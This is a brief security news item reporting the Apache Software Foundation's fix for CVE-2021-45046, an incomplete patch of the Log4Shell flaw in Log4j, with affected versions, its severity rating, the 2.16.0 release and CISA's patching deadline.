Security News > 2021 > December > Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released

The Apache Software Foundation has pushed out a new fix for the Log4j logging utility after the previous patch for the recently disclosed Log4Shell exploit was deemed as "Incomplete in certain non-default configurations."

The second vulnerability - tracked as CVE-2021-45046 - is rated 3.7 out of a maximum of 10 on the CVSS rating system and affects all versions of Log4j from 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0, which the project maintainers shipped last week to address a critical remote code execution vulnerability that could be abused to infiltrate and take over systems.

The incomplete patch for CVE-2021-44228, could be abused to "Craft malicious input data using a JNDI Lookup pattern resulting in a denial-of-service attack," the ASF said in a new advisory.

The latest version of Log4j, 2.16.0, all but removes support for message lookups and disables JNDI by default, the component that's at the heart of the vulnerability.

The U.S. Cybersecurity and Infrastructure Security Agency has also added Log4Shell to its Known Exploited Vulnerabilities Catalog, giving federal agencies a deadline of December 24 to incorporate patches for the vulnerability.

"The most immediate priority for defenders is to reduce exposure by patching and mitigating all corners of their infrastructure and investigate exposed and potentially compromised systems. This vulnerability can be everywhere," Gallagher added.

News URL

https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html